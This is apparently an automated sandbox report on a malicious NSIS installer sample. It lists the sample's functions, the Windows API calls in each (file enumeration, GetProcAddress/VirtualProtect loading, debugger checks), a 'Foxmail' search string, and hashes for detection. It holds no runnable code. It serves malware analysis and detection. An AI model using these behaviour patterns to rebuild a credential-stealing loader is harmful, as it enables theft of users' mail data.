8021->8022 8023 36f78dc9 8021->8023 8025 36f76368 20 API calls 8022->8025 8027 36f78de2 8022->8027 8024 36f76368 20 API calls 8023->8024 8026 36f78dce 8024->8026 8028 36f78e03 8025->8028 8026->7951 8027->7951 8029 36f762ac 26 API calls 8028->8029 8029->8026 8031 36f75af6 38 API calls 8030->8031 8032 36f77c24 8031->8032 8033 36f77a00 38 API calls 8032->8033 8034 36f77c34 8033->8034 8034->7966 8035->7945 8039 36f7ad24 8036->8039 8038 36f7adca 8038->7860 8040 36f7ad30 8039->8040 8050 36f78c7b RtlEnterCriticalSection 8040->8050 8042 36f7ad3e 8043 36f7ad65 8042->8043 8044 36f7ad70 8042->8044 8051 36f7ae4d 8043->8051 8046 36f76368 20 API calls 8044->8046 8047 36f7ad6b 8046->8047 8066 36f7ad9a 8047->8066 8049 36f7ad8d 8049->8038 8050->8042 8052 36f78d52 26 API calls 8051->8052 8055 36f7ae5d 8052->8055 8053 36f7ae63 8069 36f78cc1 8053->8069 8055->8053 8057 36f78d52 26 API calls 8055->8057 8065 36f7ae95 8055->8065 8056 36f78d52 26 API calls 8058 36f7aea1 CloseHandle 8056->8058 8061 36f7ae8c 8057->8061 8058->8053 8062 36f7aead GetLastError 8058->8062 8060 36f7aedd 8060->8047 8064 36f78d52 26 API calls 8061->8064 8062->8053 8063 36f76332 20 API calls 8063->8060 8064->8065 8065->8053 8065->8056 8078 36f78c9e RtlLeaveCriticalSection 8066->8078 8068 36f7ada4 8068->8049 8070 36f78d37 8069->8070 8071 36f78cd0 8069->8071 8072 36f76368 20 API calls 8070->8072 8071->8070 8076 36f78cfa 8071->8076 8073 36f78d3c 8072->8073 8074 36f76355 20 API calls 8073->8074 8075 36f78d27 8074->8075 8075->8060 8075->8063 8076->8075 8077 36f78d21 SetStdHandle 8076->8077 8077->8075 8078->8068 8079->7834 8080->7814

                                                            Executed Functions

                                                            Function 36F710F1 Relevance: 12.1, APIs: 8, Instructions: 88stringfileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 36F71137
                                                            • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 36F71151
                                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 36F7115C
                                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 36F7116D
                                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 36F7117C
                                                            • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 36F71193
                                                            • FindNextFileW.KERNELBASE(00000000,00000010), ref: 36F711D0
                                                            • FindClose.KERNEL32(00000000), ref: 36F711DB
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.321711375784.0000000036F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 36F70000, based on PE: true
                                                            • Associated: 00000002.00000002.321711346396.0000000036F70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000002.00000002.321711375784.0000000036F86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_36f70000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                            • String ID:
                                                            • API String ID: 1083526818-0
                                                            • Opcode ID: c23880beb78c2724208a342c6244fbfc0fc89bcb5800c37d24d0ca5a732a92d6
                                                            • Instruction ID: f0ef4f895534a66e6594d9752fed53de110b59ad752c88b06c358f9180f9594b
                                                            • Opcode Fuzzy Hash: c23880beb78c2724208a342c6244fbfc0fc89bcb5800c37d24d0ca5a732a92d6
                                                            • Instruction Fuzzy Hash: E921A2729043086BD720EA649C48F9B7B9CEF84354F140D2AFA58D31D4EB70D60987D6
                                                            Function 36F712EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 243stringCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 36F71434
                                                              • Part of subcall function 36F710F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 36F71137
                                                              • Part of subcall function 36F710F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 36F71151
                                                              • Part of subcall function 36F710F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 36F7115C
                                                              • Part of subcall function 36F710F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 36F7116D
                                                              • Part of subcall function 36F710F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 36F7117C
                                                              • Part of subcall function 36F710F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 36F71193
                                                              • Part of subcall function 36F710F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 36F711D0
                                                              • Part of subcall function 36F710F1: FindClose.KERNEL32(00000000), ref: 36F711DB
                                                            • lstrlenW.KERNEL32(?), ref: 36F714C5
                                                            • lstrlenW.KERNEL32(?), ref: 36F714E0
                                                            • lstrlenW.KERNEL32(?,?), ref: 36F7150F
                                                            • lstrcatW.KERNEL32(00000000), ref: 36F71521
                                                            • lstrlenW.KERNEL32(?,?), ref: 36F71547
                                                            • lstrcatW.KERNEL32(00000000), ref: 36F71553
                                                            • lstrlenW.KERNEL32(?,?), ref: 36F71579
                                                            • lstrcatW.KERNEL32(00000000), ref: 36F71585
                                                            • lstrlenW.KERNEL32(?,?), ref: 36F715AB
                                                            • lstrcatW.KERNEL32(00000000), ref: 36F715B7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.321711375784.0000000036F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 36F70000, based on PE: true
                                                            • Associated: 00000002.00000002.321711346396.0000000036F70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000002.00000002.321711375784.0000000036F86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_36f70000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                            • String ID: )$Foxmail$ProgramFiles
                                                            • API String ID: 672098462-2938083778
                                                            • Opcode ID: bff52676da5e8e1f4131ad18e8e2ec38317d778f5ee358cb0516a9c1d8a8c4e9
                                                            • Instruction ID: 8f9583fca2be4b2e0c7c7f569bde4c53e74c96a969512f8ca2645943ea38f186
                                                            • Opcode Fuzzy Hash: bff52676da5e8e1f4131ad18e8e2ec38317d778f5ee358cb0516a9c1d8a8c4e9
                                                            • Instruction Fuzzy Hash: BE81B271A00358A9DB20EBA0DC45FDE7B7DEF84750F0019D6F608E7190EA759A88CF99
                                                            Function 36F7C7E6 Relevance: 9.1, APIs: 6, Instructions: 65libraryloaderCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(36F7C7DD), ref: 36F7C7E6
                                                            • GetModuleHandleA.KERNEL32(?,36F7C7DD), ref: 36F7C838
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 36F7C860
                                                              • Part of subcall function 36F7C803: GetProcAddress.KERNEL32(00000000,36F7C7F4), ref: 36F7C804
                                                              • Part of subcall function 36F7C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,36F7C7F4,36F7C7DD), ref: 36F7C816
                                                              • Part of subcall function 36F7C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,36F7C7F4,36F7C7DD), ref: 36F7C82A
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.321711375784.0000000036F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 36F70000, based on PE: true
                                                            • Associated: 00000002.00000002.321711346396.0000000036F70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000002.00000002.321711375784.0000000036F86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_36f70000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: AddressHandleModuleProcProtectVirtual
                                                            • String ID:
                                                            • API String ID: 2099061454-0
                                                            • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                            • Instruction ID: 1f531f5c29a994c810a52531c2651753c9c1767650c0f31314e625007b3bcceb
                                                            • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                            • Instruction Fuzzy Hash: 6D01F145D8D3513EBB1156B60C01ABA6F989F277E1B201F9BE040D71D3DAA0C506C3F6
                                                            Function 36F7C7A7 Relevance: 7.6, APIs: 5, Instructions: 100libraryloaderCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 80 36f7c7a7-36f7c7bc 81 36f7c7be-36f7c7c6 80->81 82 36f7c82d 80->82 81->82 83 36f7c7c8-36f7c7f6 call 36f7c7e6 81->83 84 36f7c82f-36f7c833 82->84 91 36f7c86c 83->91 92 36f7c7f8 83->92 86 36f7c835-36f7c83d GetModuleHandleA 84->86 87 36f7c872 call 36f7c877 84->87 90 36f7c83f-36f7c847 86->90 90->90 93 36f7c849-36f7c84c 90->93 94 36f7c86d-36f7c86e 91->94 95 36f7c85b-36f7c85e 92->95 96 36f7c7fa-36f7c7fc 92->96 93->84 97 36f7c84e-36f7c850 93->97 101 36f7c866-36f7c86b 94->101 102 36f7c870 94->102 103 36f7c85f-36f7c860 GetProcAddress 95->103 96->94 98 36f7c7fe 96->98 99 36f7c856-36f7c85a 97->99 100 36f7c852-36f7c854 97->100 104 36f7c865 98->104 105 36f7c800-36f7c80b GetProcAddress 98->105 99->95 100->103 101->91 102->93 103->104 104->101 105->82 106 36f7c80d-36f7c81a VirtualProtect 105->106 107 36f7c82c 106->107 108 36f7c81c-36f7c82a VirtualProtect 106->108 107->82 108->107
                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(?,36F7C7DD), ref: 36F7C838
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 36F7C860
                                                              • Part of subcall function 36F7C7E6: GetModuleHandleA.KERNEL32(36F7C7DD), ref: 36F7C7E6
                                                              • Part of subcall function 36F7C7E6: GetProcAddress.KERNEL32(00000000,36F7C7F4), ref: 36F7C804
                                                              • Part of subcall function 36F7C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,36F7C7F4,36F7C7DD), ref: 36F7C816
                                                              • Part of subcall function 36F7C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,36F7C7F4,36F7C7DD), ref: 36F7C82A
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.321711375784.0000000036F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 36F70000, based on PE: true
                                                            • Associated: 00000002.00000002.321711346396.0000000036F70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000002.00000002.321711375784.0000000036F86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_36f70000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: AddressHandleModuleProcProtectVirtual
                                                            • String ID:
                                                            • API String ID: 2099061454-0
                                                            • Opcode ID: a452ac0e578b87b9c125a1c15392c791f0f01602258e3eee6d5826f2a307e313
                                                            • Instruction ID: bc158e742099da9f40b6ab63634ad1ad4439fb5143446da144debae6271dde78
                                                            • Opcode Fuzzy Hash: a452ac0e578b87b9c125a1c15392c791f0f01602258e3eee6d5826f2a307e313
                                                            • Instruction Fuzzy Hash: CA21036685C3816FFB118BB54C04BA67FD99F173E0F294E9BD080DB183D6A88446C3E6
                                                            Function 36F7C803 Relevance: 7.6, APIs: 5, Instructions: 54librarymemoryloaderCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 109 36f7c803-36f7c80b GetProcAddress 110 36f7c82d 109->110 111 36f7c80d-36f7c81a VirtualProtect 109->111 114 36f7c82f-36f7c833 110->114 112 36f7c82c 111->112 113 36f7c81c-36f7c82a VirtualProtect 111->113 112->110 113->112 115 36f7c835-36f7c83d GetModuleHandleA 114->115 116 36f7c872 call 36f7c877 114->116 118 36f7c83f-36f7c847 115->118 118->118 119 36f7c849-36f7c84c 118->119 119->114 120 36f7c84e-36f7c850 119->120 121 36f7c856-36f7c85e 120->121 122 36f7c852-36f7c854 120->122 123 36f7c85f-36f7c865 GetProcAddress 121->123 122->123 126 36f7c866-36f7c86e 123->126 129 36f7c870 126->129 129->119
                                                            APIs
                                                            • GetProcAddress.KERNEL32(00000000,36F7C7F4), ref: 36F7C804
                                                            • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,36F7C7F4,36F7C7DD), ref: 36F7C816
                                                            • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,36F7C7F4,36F7C7DD), ref: 36F7C82A
                                                            • GetModuleHandleA.KERNEL32(?,36F7C7DD), ref: 36F7C838
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 36F7C860
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.321711375784.0000000036F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 36F70000, based on PE: true
                                                            • Associated: 00000002.00000002.321711346396.0000000036F70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000002.00000002.321711375784.0000000036F86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_36f70000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: AddressProcProtectVirtual$HandleModule
                                                            • String ID:
                                                            • API String ID: 2152742572-0
                                                            • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                            • Instruction ID: 08d904ab02d6dd9c5b4aac3a40bac453f2e395280b9f6881c1925147f25f96db
                                                            • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                            • Instruction Fuzzy Hash: 01F0CD86A8D3503EFA1145B51C41EBA6FCC8F2B7E1B201E57E140C7183D9A58506C3F6

                                                            Non-executed Functions

                                                            Function 36F72639 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 36F72645
                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,00000017), ref: 36F72710
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,00000017), ref: 36F72730
                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,00000017), ref: 36F7273A
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.321711375784.0000000036F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 36F70000, based on PE: true
                                                            • Associated: 00000002.00000002.321711346396.0000000036F70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000002.00000002.321711375784.0000000036F86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_36f70000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                            • String ID:
                                                            • API String ID: 254469556-0
                                                            • Opcode ID: e22eb6243a1241bf3e9869905234b43709ecdd93280a076413928ef9c10da1cf
                                                            • Instruction ID: 99b09c98918d267a58ddea5ce856137b9792c9eec2f3c338e0523827c5528bcf
                                                            • Opcode Fuzzy Hash: e22eb6243a1241bf3e9869905234b43709ecdd93280a076413928ef9c10da1cf
                                                            • Instruction Fuzzy Hash: C9312A75D4521C9BDB10DFA5CD89BCDBBB8AF08344F1044AAE50DAB290EB709B86CF45
                                                            Function 36F72264 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 36F72276
                                                            • GetCurrentThreadId.KERNEL32 ref: 36F72285
                                                            • GetCurrentProcessId.KERNEL32 ref: 36F7228E
                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 36F7229B
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.321711375784.0000000036F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 36F70000, based on PE: true
                                                            • Associated: 00000002.00000002.321711346396.0000000036F70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000002.00000002.321711375784.0000000036F86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_36f70000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                            • String ID:
                                                            • API String ID: 2933794660-0
                                                            • Opcode ID: c1f4208f7cd470364007cd10453e9e2214571a0f50b379f482296638be7a07e7
                                                            • Instruction ID: 7e2a208e128b673797900b8a95b188b62a4614708f4968032b32ee28fb5a43a2
                                                            • Opcode Fuzzy Hash: c1f4208f7cd470364007cd10453e9e2214571a0f50b379f482296638be7a07e7
                                                            • Instruction Fuzzy Hash: 60F05F71C10209EBCB00DBB4C549A9EBBF8FF18345F915499D512F7144E774AB069B91
                                                            Function 36F72B1C Relevance: 6.0, APIs: 4, Instructions: 12COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,36F72C3B,36F7D1DC,00000017), ref: 36F72B21
                                                            • UnhandledExceptionFilter.KERNEL32(36F7D1DC,?,36F72C3B,36F7D1DC,00000017), ref: 36F72B2A
                                                            • GetCurrentProcess.KERNEL32(C0000409,?,36F72C3B,36F7D1DC,00000017), ref: 36F72B35
                                                            • TerminateProcess.KERNEL32(00000000,?,36F72C3B,36F7D1DC,00000017), ref: 36F72B3C
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.321711375784.0000000036F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 36F70000, based on PE: true
                                                            • Associated: 00000002.00000002.321711346396.0000000036F70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000002.00000002.321711375784.0000000036F86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_36f70000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                            • String ID:
                                                            • API String ID: 3231755760-0
                                                            • Opcode ID: 037fa0339088ba5615a376a2c9cd7b7afb423f459b458019e0b6b1273fd964c0
                                                            • Instruction ID: 9e2b241c3447bb56734a678e462fa2341653ffc4d2e431ee3c892c060cded777
                                                            • Opcode Fuzzy Hash: 037fa0339088ba5615a376a2c9cd7b7afb423f459b458019e0b6b1273fd964c0
                                                            • Instruction Fuzzy Hash: 43D0EA72044208ABDA002BE1DD0DA993B2AAF08696F847410FB0AA645DDA759457CBA6
                                                            Function 36F760E2 Relevance: 4.6, APIs: 3, Instructions: 78COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 36F761DA
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 36F761E4
                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 36F761F1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.321711375784.0000000036F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 36F70000, based on PE: true
                                                            • Associated: 00000002.00000002.321711346396.0000000036F70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000002.00000002.321711375784.0000000036F86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_36f70000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                            • String ID:
                                                            • API String ID: 3906539128-0
                                                            • Opcode ID: 61cc6abea2639b061cf80e9c5a1ea5d18f1a427ed3b6536366613ad51f06fac7
                                                            • Instruction ID: f8496fa8c98d4dfab8787258a5ca6817ece474e66419b1df553e5cc06b962f4b
                                                            • Opcode Fuzzy Hash: 61cc6abea2639b061cf80e9c5a1ea5d18f1a427ed3b6536366613ad51f06fac7
                                                            • Instruction Fuzzy Hash: 5B31D57490121CABCB21DF64D988B8DBBB4FF08350F5045DAE81CA7290E7309B91CF45
                                                            Function 36F74AB4 Relevance: 4.5, APIs: 3, Instructions: 20COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(?,?,36F74A8A,?,36F82238,0000000C,36F74BBD,00000000,00000000,00000001,36F72082,36F82108,0000000C,36F71F3A,?), ref: 36F74AD5
                                                            • TerminateProcess.KERNEL32(00000000,?,36F74A8A,?,36F82238,0000000C,36F74BBD,00000000,00000000,00000001,36F72082,36F82108,0000000C,36F71F3A,?), ref: 36F74ADC
                                                            • ExitProcess.KERNEL32 ref: 36F74AEE
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.321711375784.0000000036F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 36F70000, based on PE: true
                                                            • Associated: 00000002.00000002.321711346396.0000000036F70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000002.00000002.321711375784.0000000036F86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_36f70000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentExitTerminate
                                                            • String ID:
                                                            • API String ID: 1703294689-0
                                                            • Opcode ID: 645f982e3e9057b66d4619edbcb6b069c3d7e1dc7921a29d79bef2b43ffadf2d
                                                            • Instruction ID: 4d6750532eab3580a65bc13e705878228e9df873bb18c31ca72893f82ac1086e
                                                            • Opcode Fuzzy Hash: 645f982e3e9057b66d4619edbcb6b069c3d7e1dc7921a29d79bef2b43ffadf2d
                                                            • Instruction Fuzzy Hash: C4E04636000608AFDF016F24CD08A493F2AFF403C1B906829FA449B168CB35EC43CAA5
                                                            Function 36F7B5C1 Relevance: 1.8, APIs: 1, Instructions: 269COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,36F7B5BC,?,?,00000008,?,?,36F7B25C,00000000), ref: 36F7B7EE
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.321711375784.0000000036F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 36F70000, based on PE: true
                                                            • Associated: 00000002.00000002.321711346396.0000000036F70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000002.00000002.321711375784.0000000036F86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_36f70000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ExceptionRaise
                                                            • String ID:
                                                            • API String ID: 3997070919-0
                                                            • Opcode ID: fa016078a628a33adf065a463057ec20ddf261732c10f45ae0ed05382e663ceb
                                                            • Instruction ID: a1a1ee7178d1273bf655548f503d5648846b132becb937972d35d8cc2e75f3ad
                                                            • Opcode Fuzzy Hash: fa016078a628a33adf065a463057ec20ddf261732c10f45ae0ed05382e663ceb
                                                            • Instruction Fuzzy Hash: A0B19F76510609CFE705CF29C486B947BF0FF063A5F658A99E899CF2A1C735E982CB40
                                                            Function 36F72933 Relevance: 1.6, APIs: 1, Instructions: 129COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 36F7294C
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.321711375784.0000000036F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 36F70000, based on PE: true
                                                            • Associated: 00000002.00000002.321711346396.0000000036F70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000002.00000002.321711375784.0000000036F86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_36f70000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: FeaturePresentProcessor
                                                            • String ID:
                                                            • API String ID: 2325560087-0
                                                            • Opcode ID: 9dfa001f2783c62c4a083da8b6cf0706aa2fbb637ad606b5f9efa66f31ea3c8b
                                                            • Instruction ID: be505f66f3870bf4911a76a82e2b81a670c14da2a41e3ad0ef76bfaeec12197c
                                                            • Opcode Fuzzy Hash: 9dfa001f2783c62c4a083da8b6cf0706aa2fbb637ad606b5f9efa66f31ea3c8b
                                                            • Instruction Fuzzy Hash: E1418DB2D152098BEB10CF99C5C16AEBBF5FF08354F2489AAD409FB254D330DA41CBA1
                                                            Function 36F7724E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.321711375784.0000000036F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 36F70000, based on PE: true
                                                            • Associated: 00000002.00000002.321711346396.0000000036F70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000002.00000002.321711375784.0000000036F86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_36f70000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: HeapProcess
                                                            • String ID:
                                                            • API String ID: 54951025-0
                                                            • Opcode ID: 6a355ac481028a291723a9742938dafbb9ec934cdbcb2e7017da322acd5b1888
                                                            • Instruction ID: 7b97868fa5cbc74560ac278308f8a13d2ff1993b12909e2263c02c72effcba49
                                                            • Opcode Fuzzy Hash: 6a355ac481028a291723a9742938dafbb9ec934cdbcb2e7017da322acd5b1888
                                                            • Instruction Fuzzy Hash: 21A011302002028F83088E30820E20C3AAEAE002C030020A8AA0CE002CEB2080028A82
                                                            Function 36F87194 Relevance: .8, Instructions: 751COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.321711375784.0000000036F86000.00000040.00001000.00020000.00000000.sdmp, Offset: 36F70000, based on PE: true
                                                            • Associated: 00000002.00000002.321711346396.0000000036F70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000002.00000002.321711375784.0000000036F71000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_36f70000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f12bac2ceacaba3709f449de7301e54826307763cc64d35c491f096f7cc92462
                                                            • Instruction ID: 1f737615c9295962d6fea8b2c462e73830db10ba5097507b58b99b1728d89208
                                                            • Opcode Fuzzy Hash: f12bac2ceacaba3709f449de7301e54826307763cc64d35c491f096f7cc92462
                                                            • Instruction Fuzzy Hash: C9629A356083A58FD314CF29C88465EBBE2FF89385F114E6DE9A58B360E771D948CB42
                                                            Function 00403350 Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 82stringCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.321687932538.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.321687903671.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000002.00000002.321687963130.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000002.00000002.321687991478.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000002.00000002.321688063837.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ErrorModeVersionlstrlen
                                                            • String ID: NSIS Error$UXTHEME
                                                            • API String ID: 758611499-110662866
                                                            • Opcode ID: e2cfd11bc430893589e6fb0dd8a51cd0c36ed037e82ee5f8c984086a2a97847c
                                                            • Instruction ID: 2ca4496f1a14d18b161ef3d64c4edf84b84b785272aa1eaa0a4cb80950281d6e
                                                            • Opcode Fuzzy Hash: e2cfd11bc430893589e6fb0dd8a51cd0c36ed037e82ee5f8c984086a2a97847c
                                                            • Instruction Fuzzy Hash: D621D370500700AFD7107F71AE49B1B3AA8AF40705F40443EFA82B62E2EF7C49458B6E
                                                            Function 36F71CCA Relevance: 13.6, APIs: 9, Instructions: 84fileCOMMON
